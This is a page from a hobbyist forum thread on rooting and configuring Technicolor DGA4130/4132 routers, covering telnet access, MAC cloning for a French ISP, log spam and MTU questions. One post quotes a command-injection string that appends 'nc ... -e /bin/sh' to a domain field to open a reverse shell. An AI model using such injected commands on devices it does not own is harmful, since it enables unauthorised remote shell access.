Kitz ADSL Broadband Information
adsl spacer  
Support this site
Home Broadband ISPs Tech Routers Wiki Forum
 
     
   Compare ISP   Rate your ISP
   Glossary   Glossary
 
Please login or register.

Login with username, password and session length
Advanced search  

News:

Pages: 1 ... 79 80 [81] 82

Author Topic: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)  (Read 232089 times)

Gee-Gee

  • Just arrived
  • *
  • Posts: 1
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1200 on: January 24, 2019, 09:29:45 AM »

Problem:
DSLAM Chipset: Invalid version, can't convert. Raw value: Exact path not found!
DSLAM Firmware: Exact path not found!
VDSL Profile: Exact path not found!
VDSL DSLAM Port: Exact path not found

Report it on GitHub pls

Inviato dal mio SM-G950F utilizzando Tapatalk
The relevant link to github is: https://github.com/Ansuel/tch-nginx-gui/issues/426

After issuing
Code: [Select]
/etc/init.d/transformer restart the problem is fixed.
Logged

lofgents

  • Member
  • **
  • Posts: 37
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1201 on: February 06, 2019, 01:36:20 PM »

I am trying to set up the DGA4130 with dsl stats.

I have had to set up the modem from scratch as it I could not access the GUI.

I unlocked then updated to GUI 8.8.55 on Software version AGTEF _1.0.3. enabled telnet from the GUI and everything is working so far.

Tried to set up dsl stats using previous settings but am unable to login to modem from dsl stats.

Tried to telnet from admin appplied CMD prompt and have an error could not open connection to the host on port 23.

I can telnet in to another device so telnet is working on the P.C. is there a problem with GUI 8.8.55 if so could someone advise me if it is fixable or know of a working GUI with dsl stats.

Thanks and hope the info is complete enough.

I found this and ran it with putty /usr/sbin/telnetd I now have access to telnet. Apologies but also may help someone else.
« Last Edit: February 06, 2019, 02:14:03 PM by lofgents »
Logged

philou

  • Just arrived
  • *
  • Posts: 3
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1202 on: February 20, 2019, 02:13:36 PM »

Hello,
I will need help to know if it was possible to make a clone mac to surf the internet with fai free, mandatory for it to work with a modem other than the freebox in vdsl2.I retrieved the mac address of the freebox v6 but I doubt we can do it.I am in France.
all my lights are green, dga4132 rooted, firmware 1.1.2 and last version gui ansuel.
thank you in advance who can help me
Logged

krypton

  • Reg Member
  • ***
  • Posts: 127
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1203 on: February 20, 2019, 09:20:55 PM »

If I understand your question correctly you want to change the mac address. You can edit the /etc/config/network file to set any mac address you want.
Logged

philou

  • Just arrived
  • *
  • Posts: 3
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1204 on: February 23, 2019, 05:45:14 PM »

hello

Could you help me according to this config to apply it on the tim with fai free.
if it's possible or not with the dga4132?
Thank you.

This config works on the tplink9970 but I can not get on the tim.(root,firmware 1.1.2, last gui ansuel)

my config in example:

(IP / MAC of the freebox:
66.66.66.29 00: 07: cb: ff: ff: 24)
(IP / MAC gateway:
66.66.66.254 00: 07: cb: ff: 4f: a7)

on the tplink9970
- router mode
- in IPoE
- DHCP for IP
- DNS by DHCP or hard
- Activated VLAN VIF 836
- NAT enabled

On the TP-Link, the modem automatically supports the cloning of the MAC address on the modem interface.
Go to "Network-> MAC Clone", choose the interface ipoe_ptm_836_0_d, and put the MAC address of the freebox (00: 07: cb: ff: ff: 24 with my example).
 
Regarding the management of the gateway and the ARP, the TP-Link seems to associate itself the IP of the gateway with its MAC address thanks to DHCP.
Basically it is mandatory to enable DHCP with the TP-Link, it allows him to make the link all alone between 66.66.66.254 and 00: 07: cb: ff: 4f: a7.

Logged

shdf

  • Reg Member
  • ***
  • Posts: 370
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1205 on: February 23, 2019, 09:40:42 PM »

@philou
tu te connectes avec winscp a ton modem, et tu vas dans le fichier : /etc/config/network
avec un editeur de text comme notepad++ par exemple tu affiches le contenu, et tu modifies les adresses mac.

@Ansuel would it be possible to spoof the MAC address from the GUI ?
« Last Edit: February 23, 2019, 09:47:40 PM by shdf »
Logged
DGA4130 Firmware 2.0.0 Gui 9.3.77 Stable
DGA4132 Firmware 2.0.0 Gui 9.3.77 Stable
MEGA : Removed

philou

  • Just arrived
  • *
  • Posts: 3
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1206 on: February 24, 2019, 09:26:56 AM »

Hello,
Thank you for your quick reply.
sub ansuel impossible to make a spoof mac or mac clone indeed would be the ideal.

winscp
I tried:
ifconfig wanptm0 down
ifconfig wanptm0 hw ether 00: 07: xx: xx: xx: xx
ifconfig wanptm0 up
arp -s 88.xx.xx.254 00: 07: xx: xx: xx: f8
  ping 8.8.8.8
route add default gw 88.xx.xx.254
ping 8.8.8.8
success.

it's good it works, internet ok.

The problem with this configuration is that it is not backed up and is lost at the slightest disconnection.
It is therefore necessary each time the modem reconnects retype commands.
« Last Edit: February 24, 2019, 02:46:30 PM by philou »
Logged

shdf

  • Reg Member
  • ***
  • Posts: 370
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1207 on: February 26, 2019, 10:21:55 PM »

it is permanent if you edit the file /etc/config/network

edit:
look here : https://www.ilpuntotecnico.com/forum/index.php/topic,78585.msg247621.html#msg247621

Quote
in broadband you can set the mac address of the interface
« Last Edit: February 26, 2019, 10:27:21 PM by shdf »
Logged
DGA4130 Firmware 2.0.0 Gui 9.3.77 Stable
DGA4132 Firmware 2.0.0 Gui 9.3.77 Stable
MEGA : Removed

Ineid

  • Just arrived
  • *
  • Posts: 3
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1208 on: April 04, 2019, 06:53:13 AM »


quel est le meilleur pilote adsl pour orange adsl ?

[Moderator edited to add the output produced by "Google Translate", below.]

What is the best ADSL driver for Orange ADSL?
« Last Edit: April 04, 2019, 06:35:29 PM by burakkucat »
Logged

Ineid

  • Just arrived
  • *
  • Posts: 3
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1209 on: April 07, 2019, 03:23:52 PM »

@shdf ...

They originally posted these error messages. Now that I test with the second 4132 on AGTHP_1.1.0_002_CLOSED a little bit, the message fills me the log dense, about every 10 seconds. This was/is not so under 1.0.5, at least not so extreme or simply disappeared again.

Do you still have these messages or have you been able to fix them in the meantime?

I guess this has something to do with iproute.


Code: [Select]
Dec 2 13:32:39   kern.warn   kernel   [ 7846.392000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.352000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.334000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.288000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.270000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.234000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.217000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.184000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.168000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.135000] netlink: 20 bytes leftover after parsing attributes.
Dec 2 13:32:39   kern.warn   kernel   [ 7846.118000] netlink: 20 bytes leftover after parsing attributes.

edit

I get this Output:
logread | grep -i -E "sqm|netlink"

Code: [Select]
root@modemtim:~# logread | grep -i -E "sqm|netlink"
Thu Feb 15 16:31:56 2018 kern.info kernel: [   20.245000] Initializing XFRM netlink socket
Thu Feb 15 16:31:56 2018 kern.info kernel: [   20.277000] L2TP netlink interface
Thu Feb 15 16:31:56 2018 kern.info kernel: [   20.440000] Netfilter messages via NETLINK v0.30.
Thu Feb 15 16:31:56 2018 kern.info kernel: [   24.387000] ctnetlink v0.93: registering with nfnetlink.
Thu Feb 15 16:32:15 2018 daemon.notice procd: /etc/rc.d/S50intercept: RTNETLINK answers: No such file or directory
Thu Feb 15 16:32:15 2018 daemon.notice procd: /etc/rc.d/S50intercept: RTNETLINK answers: No such file or directory
Thu Feb 15 16:32:17 2018 kern.warn kernel: [   49.406000] br_netlink_mcpd.c: Setting registration type 0 pid to 3326
Thu Feb 15 16:32:23 2018 kern.warn kernel: [   55.106000] netlink: 20 bytes leftover after parsing attributes.
Thu Feb 15 16:32:23 2018 kern.warn kernel: [   55.111000] netlink: 20 bytes leftover after parsing attributes.
Thu Feb 15 16:32:23 2018 kern.warn kernel: [   55.127000] netlink: 20 bytes leftover after parsing attributes.
Thu Feb 15 16:32:23 2018 kern.warn kernel: [   55.132000] netlink: 20 bytes leftover after parsing attributes.

 :)
I have this too, how do I disable this spam in the log?
Logged

mxhelmy

  • Just arrived
  • *
  • Posts: 19
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1210 on: April 16, 2019, 07:01:08 PM »

How to change the MTU ? is there a method to do it from the GUI or the command line? Can someone help please?!
Logged

hck88

  • Just arrived
  • *
  • Posts: 1
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1211 on: April 18, 2019, 07:09:04 PM »

hello i stacked here , any solutions?
Logged

unknown79

  • Just arrived
  • *
  • Posts: 4
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1212 on: July 09, 2019, 10:23:57 AM »

shdf

i have the tg788v v3 i tryd to use the test.com;nc 192.168.1.10 1337 -e /bin/sh & (using my ip) but on firmware 17.1 gold (17.1.7897-0001035-20181023115423)
you cant use test.com;nc 192.168.1.10 1337 -e /bin/sh & because it says Label within domain name has invalid syntax. Invalid IP address.
i tried to put it somewhere else but didnt workd.
do you have some info or other way of rooting it?any help would be much appreciated.
the isp has locked everything on this device and its really slow on loading the gui plus sometimes (happens often) it gets stuck and doesnt even load after that all you can do is restart it if you wanna log in to the gateway.
thanks in advance
Logged

shdf

  • Reg Member
  • ***
  • Posts: 370
    • Liveboxinfo
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1213 on: August 16, 2019, 09:51:33 AM »

Hello,
for anything about rooting/upgrading this modem/router, now please go here : https://github.com/Ansuel/tch-nginx-gui

All officialy supported Technicolor modems are listed here :
Quote
DGA4132 / VBNT-S
DGA4131 / VBNT-O
DGA4130 / VBNT-K
TG788vn v2 / VDNT-W
TG789vac v2 HP / VBNT-L
TG789vac v2 / VANT-6
TG789vac (v1) / VANT-D
TG789vac XTREAM 35B / VBNT-F
TG799vac / VANT-F
TG799vac XTREAM / VBNT-H
TG800vac / VANT-Y
Logged
DGA4130 Firmware 2.0.0 Gui 9.3.77 Stable
DGA4132 Firmware 2.0.0 Gui 9.3.77 Stable
MEGA : Removed

unknown79

  • Just arrived
  • *
  • Posts: 4
Re: Modem/Router VDSL2 Technicolor DGA4130 (BCM63138)
« Reply #1214 on: August 19, 2019, 01:09:07 PM »

yeah thanks for the response but these aren't what im looking for.. i search a way for the "vant-z"
Logged
Pages: 1 ... 79 80 [81] 82